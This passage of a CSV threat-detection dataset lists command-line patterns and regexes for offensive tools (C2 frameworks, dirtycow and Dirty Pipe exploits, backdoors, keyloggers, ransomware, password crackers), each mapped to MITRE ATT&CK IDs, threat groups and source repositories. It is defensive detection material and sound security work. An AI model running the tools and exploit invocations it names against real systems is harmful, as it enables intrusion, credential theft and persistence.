T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4100" "*./*octopus.py*",".{0,1000}\.\/.{0,1000}octopus\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","#linux","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","4102" "*./agscript *",".{0,1000}\.\/agscript\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4103" "*./agscript * nemesis-bot *",".{0,1000}\.\/agscript\s.{0,1000}\snemesis\-bot\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","4104" "*./AutoSUID.sh*",".{0,1000}\.\/AutoSUID\.sh.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the 
privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","4105" "*./awsloot *",".{0,1000}\.\/awsloot\s.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","0","#linux","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","4106" "*./awsloot.py*",".{0,1000}\.\/awsloot\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","#linux","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","4107" "*./backdoor.sh *",".{0,1000}\.\/backdoor\.sh\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","4108" "*./Brutesploit*",".{0,1000}\.\/Brutesploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","#linux","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","4110" "*./c2lint *",".{0,1000}\.\/c2lint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://www.cobaltstrike.com/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","4111" "*./chisel *",".{0,1000}\.\/chisel\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","Black Basta","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4113" "*./cowpy.sh *",".{0,1000}\.\/cowpy\.sh\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","0","#linux","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","4116" "*./cowroot*",".{0,1000}\.\/cowroot.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/exrienz/DirtyCow","1","0","#linux","N/A","N/A","1","28","25","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z","4117" "*./CVE-202* -*","\.\/CVE\-20.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","POC","CVE POC execution","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce","1","0","#linux","N/A","N/A","1","37","14","2022-04-01T08:44:19Z","2022-04-01T07:55:26Z","4118" "*./dcow -s*",".{0,1000}\.\/dcow\s\-s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/gbonacini/CVE-2016-5195","1","0","#linux","N/A","N/A","4","326","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z","4119" 
"*./dedsec_ransomware*",".{0,1000}\.\/dedsec_ransomware.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","#linux","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","4120" "*./Dent -*",".{0,1000}\.\/Dent\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/optiv/Dent","1","0","#linux","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","4121" "*./dirty*",".{0,1000}\.\/dirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/FireFart/dirtycow","1","0","#linux","N/A","N/A","9","884","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z","4122" "*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/bbaranoff/CVE-2022-0847","1","1","#linux","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z","4123" "*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","1","#linux","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","4124" "*./dnscat*",".{0,1000}\.\/dnscat.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","4125" "*./dome.py*",".{0,1000}\.\/dome\.py.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","#linux","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","4126" "*./donut *.exe*",".{0,1000}\.\/donut\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control 
framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#linux","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","4127" "*./dynasty.sh*",".{0,1000}\.\/dynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","4129" "*./encryptor -f *.exe*",".{0,1000}\.\/encryptor\s\-f\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#linux","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","4130" "*./evil-proxy*",".{0,1000}\.\/evil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","#linux","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","4132" "*./Exfil.sh*",".{0,1000}\.\/Exfil\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - 
TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","4133" "*./exploit /etc/passwd 1 *cat /etc/passwd*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\s.{0,1000}cat\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xIronGoat/dirty-pipe","1","0","#linux","N/A","N/A","1","10","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z","4135" "*./exploit /etc/passwd 1 ootz:*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\sootz\:.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ahrixia/CVE_2022_0847","1","0","#linux","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z","4136" "*./fake-sms*",".{0,1000}\.\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","#linux","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","4137" "*./fee.py*",".{0,1000}\.\/fee\.py.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","4138" "*./fscan*",".{0,1000}\.\/fscan.{0,1000}","offensive_tool_keyword","fscan","Vulnerability 
scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","4140" "*./gcr.py*",".{0,1000}\.\/gcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","#linux","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","4141" "*./getExploit*",".{0,1000}\.\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Gioyik/getExploit","1","1","#linux","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z","4142" "*./gimmeSH*",".{0,1000}\.\/gimmeSH.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. 
your Internet protocol address and your port number.","T1059 - T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/A3h1nt/gimmeSH","1","1","#linux","N/A","N/A","2","183","28","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z","4143" "*./GoAWSConsoleSpray*",".{0,1000}\.\/GoAWSConsoleSpray.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","#linux","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","4144" "*./go-secdump*",".{0,1000}\.\/go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","#linux","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","4145" "*./GoStompy *",".{0,1000}\.\/GoStompy\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","#linux","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","4146" "*./hashcat -*",".{0,1000}\.\/hashcat\s\-.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","#linux","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","4147" 
"*./hashview/*",".{0,1000}\.\/hashview\/.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","#linux","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","4148" "*./Havoc",".{0,1000}\.\/Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","#linux","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","4149" "*./havoc *",".{0,1000}\.\/havoc\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#linux","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","4150" "*./hoaxshell*",".{0,1000}\.\/hoaxshell.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#linux","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","4151" "*./hping *",".{0,1000}\.\/hping\s.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","#linux","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","4152" "*./hydra *",".{0,1000}\.\/hydra\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","4153" "*./inceptor.py*",".{0,1000}\.\/inceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","#linux","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","4154" "*./injector -*",".{0,1000}\.\/injector\s\-.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","4155" "*./iodined*",".{0,1000}\.\/iodined.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","4156" "*./Ivy -*",".{0,1000}\.\/Ivy\s\-.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","#linux","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","4157" "*./kali-install.sh*",".{0,1000}\.\/kali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","#linux","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","4158" "*./kerbrute *",".{0,1000}\.\/kerbrute\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","#linux","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","4159" "*./koadic*",".{0,1000}\.\/koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","#linux","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","4160" "*./kubestroyer*",".{0,1000}\.\/kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","#linux","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","4161" "*./Lalin.sh*",".{0,1000}\.\/Lalin\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","1","#linux","N/A","N/A","4","366","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z","4162" "*./litefuzz.py*",".{0,1000}\.\/litefuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","1","#linux","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","4163" "*./logger.sh * &> /dev/null && exit*",".{0,1000}\.\/logger\.sh\s.{0,1000}\s\&\>\s\/dev\/null\s\&\&\sexit.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#linux","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","4164" "*./lse.sh*",".{0,1000}\.\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","4165" "*./manjusaka*",".{0,1000}\.\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
